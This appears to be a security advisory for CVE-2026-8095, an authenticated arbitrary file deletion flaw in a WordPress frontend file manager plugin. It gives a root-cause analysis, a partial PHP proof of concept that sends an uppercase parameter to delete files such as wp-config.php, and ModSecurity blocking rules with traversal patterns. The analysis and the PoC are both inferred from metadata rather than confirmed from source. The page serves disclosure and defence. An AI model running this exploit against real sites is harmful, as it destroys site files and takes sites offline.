analysis:

Atomic Edge analysis of CVE-2026-8095 (metadata-based): This vulnerability allows authenticated attackers with Subscriber-level access to delete arbitrary files on the WordPress server. The flaw resides in the Frontend File Manager Plugin (slug: nmedia-user-file-uploader) version 23.6 and earlier. The CVSS score of 8.1 indicates high severity, with impact on integrity and availability.

The root cause is a case-sensitivity bypass in the wpfm_file_meta_update AJAX handler. The plugin attempts to sanitize the wpfm_dir_path parameter by checking whether it is set, but fails to account for case variations. By supplying WPFM_DIR_PATH in uppercase, the attacker bypasses the unset check. The value is later normalized to wpfm_dir_path by sanitize_key() during update_post_meta(), which overwrites the stored file path. This malicious path is then passed directly to unlink() in delete_file_locally() without any directory containment validation. This conclusion is inferred from the CWE (73: External Control of File Name or Path) and the detailed vulnerability description, as no source code diff is available.

Exploitation requires an authenticated session with Subscriber privileges. The attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to wpfm_file_meta_update. The request includes the WPFM_DIR_PATH (uppercase) parameter containing an absolute path to a target file, such as /var/www/html/wp-config.php. The plugin processes the request, overwrites the stored path, and triggers the delete_file_locally() function, which calls unlink() on the supplied path. No nonce or additional authorization checks are mentioned, making this a direct exploitation path.

Remediation requires implementing proper case-insensitive parameter handling and directory path validation. The plugin should use strict comparison functions that account for case variations, such as array_key_exists() with lowercase keys. Additionally, the plugin must validate that the final file path resides within the intended upload directory before passing it to unlink(). This should include realpath() resolution and strpos() checks to prevent directory traversal.

Successful exploitation allows an attacker to delete critical files like wp-config.php, .htaccess, or index.php. Deleting wp-config.php breaks the database connection, rendering the site completely inaccessible. An attacker could delete the active theme's index.php to cause further disruption. In a deployment where auto-prepend or auto-append files are configured, deletion of those files could lead to remote code execution if combined with other vulnerabilities. The ultimate impact is full site takeover through denial of service and potential privilege escalation.

poc_php:

```php
// Atomic Edge CVE Research – Proof of Concept (metadata-based)
// CVE-2026-8095 – Frontend File Manager Plugin 'wpfm_file_meta_update',
    'WPFM_DIR_PATH' => $target_file, // Uppercase parameter bypasses sanitization
    'file_id'       => 1             // Arbitrary file ID, may need adjustment
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);

// Check response
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo 'HTTP Response Code: ' . $http_code . PHP_EOL;
echo 'Response Body: ' . substr($response, 0, 500) . PHP_EOL;

if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo 'Exploit likely successful. File deletion attempted.' . PHP_EOL;
} else {
    echo 'Exploit may have failed. Check error response.' . PHP_EOL;
}

curl_close($ch);

// Note: This PoC assumes the AJAX action wpfm_file_meta_update and parameter WPFM_DIR_PATH
// are correct based on the CVE description. The file_id parameter may need to be a valid
// file ID owned by the attacker. No source code was available to confirm exact parameter
// names or required nonce handling.
```

modsecurity_rule:

```apache
# Atomic Edge WAF Rule – CVE-2026-8095 (metadata-based)
# Blocks exploitation of arbitrary file deletion via case-sensitive bypass
# Targets the wpfm_file_meta_update AJAX handler with uppercase WPFM_DIR_PATH parameter

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20268095,phase:2,deny,status:403,chain,msg:'CVE-2026-8095 exploitation attempt via AJAX – Frontend File Manager Plugin file deletion',severity:'CRITICAL',tag:'CVE-2026-8095'"
    SecRule ARGS_POST:action "@streq wpfm_file_meta_update" "chain"
    SecRule ARGS_POST:WPFM_DIR_PATH "@rx ^/[a-zA-Z0-9_/-]+" \
        "t:none"

# Alternative: Also block if lowercase parameter contains path traversal patterns
# This second rule blocks attempts to use lowercase parameter with directory traversal
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
    "id:20268096,phase:2,deny,status:403,chain,msg:'CVE-2026-8095 exploitation attempt via AJAX – directory traversal in file path',severity:'CRITICAL',tag:'CVE-2026-8095'"
    SecRule ARGS_POST:action "@streq wpfm_file_meta_update" "chain"
    SecRule ARGS_POST:wpfm_dir_path "@rx \.\./|\.\.\\|\.\.%2f|\.\.%5c|\.\.\x00" \
        "t:lowercase"
```

Published: June 27, 2026

CVE-2026-8095: Frontend File Manager Plugin <= 23.6 Authenticated (Subscriber+) Arbitrary File Deletion PoC, Patch Analysis & Rule

CVE ID: CVE-2026-8095
Plugin: nmedia-user-file-uploader
Severity: High (CVSS 8.1)
CWE: 73
Vulnerable Version: 23.6
Patched Version: —
Disclosed: June 26, 2026